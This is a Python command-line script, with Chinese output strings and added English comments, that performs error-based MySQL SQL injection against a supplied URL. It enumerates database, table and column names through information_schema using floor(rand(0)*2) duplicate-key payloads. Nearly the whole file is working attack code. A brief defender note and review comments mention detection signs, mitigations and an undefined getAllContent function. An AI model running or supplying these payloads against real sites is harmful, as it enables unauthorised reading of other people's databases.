#!/usr/bin/env python3 # -*- coding: utf-8 -*-
from optparse import OptionParser import sys import requests import re
# Command-line interface for an error-based MySQL SQL-injection enumeration
# script.  Every option is optional; main() decides what to do from which
# combination of -U/-D/-T/-C was supplied.
# For defenders: the traffic this script generates is easy to recognise --
# the URL parameter carries `information_schema` lookups wrapped in
# `floor(rand(0)*2)` / `group by` error-based subqueries, and the script only
# works when the application echoes the raw MySQL error text back to the
# client.  Parameterised queries and not exposing database errors in responses
# are the mitigations.
parser=OptionParser()
# -D / -T / -C name the schema, table and column to enumerate; -U is the
# injectable URL that the payload strings below are appended to.
parser.add_option("-D", "--database", action="store",type="string",dest="database",help="Please input test databases")
parser.add_option("-T", "--table",action="store",type="string",dest="table",help="Please input test table")
parser.add_option("-C", "--column",action="store",type="string",dest="column",help="Please input test column")
parser.add_option("-U","--url", action="store",type="string",dest="url",help="Please input test url")
# NOTE: arguments are parsed at import time, not inside main(), so `options`
# is a module-level global that main() reads.
(options,args) = parser.parse_args()
def main() -> None:
    """Dispatch to one enumeration routine based on which options were set.

    Reads the module-level ``options`` produced by ``parser.parse_args()``.
    With no options at all it prints the help and exits.  Any combination
    not listed below (e.g. a table without a database) matches no branch
    and the function silently does nothing.

    Raises:
        NameError: the last branch calls ``getAllContent``, which is not
            defined anywhere in this file as shown.
    """
    if options.url == None and options.database == None and options.table == None and options.column == None:
        print("Please read the help")
        parser.print_help()
        sys.exit()
    elif options.url != None and options.database ==None and options.table == None and options.column == None:
        # only a URL: list schema names
        get_all_databases(options.url)
    elif options.url != None and options.database !=None and options.table == None and options.column == None:
        # URL + database: list table names in that schema
        get_db_all_tables(options.url,options.database)
    elif options.url != None and options.database !=None and options.table != None and options.column == None:
        # URL + database + table: list column names in that table
        get_db_tb_all_columns(options.url,options.database,options.table)
    elif options.url != None and options.database !=None and options.table != None and options.column != None:
        # NOTE(review): getAllContent is never defined in this file; reaching
        # this branch raises NameError.
        getAllContent(options.url,options.database,options.table,options.column)
def http_get(url: str) -> str:
    """Issue a plain GET for *url* and return the decoded response body.

    No timeout is set and the HTTP status is not checked; any
    ``requests`` exception propagates to the caller.
    """
    result = requests.get(url)
    return result.text
def get_all_databases(url: str) -> None:
    """Print the number of schemas and then each schema name.

    Both payloads use the MySQL duplicate-key error technique: the value of
    the inner subquery is wrapped in ``0x7e`` (``~``) and grouped by
    ``floor(rand(0)*2)``, which makes the server raise an error whose
    message contains that value.  The script then pulls the text between
    the two ``~`` characters out of the response body.  Nothing is printed
    correctly unless the application echoes the raw database error.

    Args:
        url: injectable URL; the payload is appended to it verbatim.

    Raises:
        AttributeError: if the ``~...~`` marker is absent from the response
            (``re.search`` returns ``None`` and ``.group`` is called on it).
        ValueError: if the extracted text is not an integer.
    """
    db_nums_payload = url + " and (select 1 from (select count(*),concat(0x7e,(select count(schema_name) from information_schema.schemata),0x7e,floor(rand(0)*2))x from information_schema.tables group by x)a)"
    # print(db_nums_payload)
    html = http_get(db_nums_payload)
    # print(html)
    result = re.search(r'~(.*?)~',html,re.S|re.I)
    # print(result)
    db_nums = int(result.group(1))
    # "number of databases: %d"
    print("数据库的个数为:%d" % db_nums)
    # One request per schema, paging with `limit x,1`.
    for x in range(db_nums):
        db_name_payload = url + " and (select 1 from (select count(*),concat(0x7e,(select schema_name from information_schema.schemata limit %d,1),0x7e,floor(rand(0)*2))x from information_schema.tables group by x)a)" % x
        html = http_get(db_name_payload)
        # print(html)
        result = re.search(r'~(.*?)~',html,re.S|re.I)
        db_name = result.group(1)
        # "database #%d is: %s"
        print("第%d个数据库为:%s" % (x+1,db_name))
def get_db_all_tables(url: str, database: str) -> None:
    """Print the table count for *database*, then each table name.

    Same error-based ``~value~`` extraction as ``get_all_databases``,
    restricted to ``information_schema.tables`` rows whose
    ``table_schema`` equals *database*.  *database* is interpolated into the
    payload with ``%s`` and no quoting.

    Raises:
        AttributeError: if no ``~...~`` marker is found in the response.
        ValueError: if the count text is not an integer.
    """
    tb_nums_payload = url + " and (select 1 from (select count(*),concat(0x7e,(select count(table_name) from information_schema.tables where table_schema = '%s'),0x7e,floor(rand(0)*2))x from information_schema.tables group by x)a)" % database
    # print(tb_nums_payload)
    html = http_get(tb_nums_payload)
    # print(html)
    result = re.search(r'~(.*?)~',html,re.S|re.I)
    tb_nums = int(result.group(1))
    # "<database> number of tables in the database: %d"
    print(database,"数据库中表的个数为:%d" % tb_nums)
    for x in range(tb_nums):
        tb_name_payload = url + " and (select 1 from (select count(*),concat(0x7e,(select table_name from information_schema.tables where table_schema = '%s' limit %d,1),0x7e,floor(rand(0)*2))x from information_schema.tables group by x)a)" % (database,x)
        # print(tb_name_payload)
        html = http_get(tb_name_payload)
        # print(html)
        result = re.search(r'~(.*?)~',html,re.S|re.I)
        tb_name = result.group(1)
        # NOTE: the message literally says "database #%d is" (数据库) although
        # it prints a table name; left unchanged because it is runtime output.
        print(database,"数据库第%d个数据库为:%s" % (x+1,tb_name))
def get_db_tb_all_columns(url: str, database: str, table: str) -> None:
    """Print the column count of *database*.*table*, then each column name.

    Same error-based ``~value~`` extraction as the other routines, reading
    ``information_schema.columns`` filtered by ``table_schema`` and
    ``table_name``.  Both names are interpolated with ``%s`` and no quoting.

    Raises:
        AttributeError: if no ``~...~`` marker is found in the response.
        ValueError: if the count text is not an integer.
    """
    co_nums_payload = url + " and (select 1 from (select count(*),concat(0x7e,(select count(column_name) from information_schema.columns where table_schema = '%s' and table_name = '%s'),0x7e,floor(rand(0)*2))x from information_schema.tables group by x)a)" % (database,table)
    html = http_get(co_nums_payload)
    #print(html)
    result = re.search(r'~(.*?)~',html,re.S|re.I)
    co_nums = int(result.group(1))
    # print(co_nums)
    # "number of fields in table %s of database %s: %d"
    print("%s数据库中的%s表里面的字段个数为:%d" % (database,table,co_nums))
    for x in range(co_nums):
        co_name_payload = url + " and (select 1 from (select count(*),concat(0x7e,(select column_name from information_schema.columns where table_schema = '%s' and table_name = '%s' limit %d,1),0x7e,floor(rand(0)*2))x from information_schema.tables group by x)a)" % (database,table,x)
        html = http_get(co_name_payload)
        result = re.search(r'~(.*?)~',html,re.S|re.I)
        co_name = result.group(1)
        # "field #%d of table %s in database %s is: %s"
        print("%s数据库中%s表中的第%d个字段为:%s" % (database,table,x+1,co_name))
# Script entry point.  Note that option parsing already happened at import
# time (see the parser block above), so importing this module as a library
# would also consume sys.argv.
if __name__ == '__main__':
    main()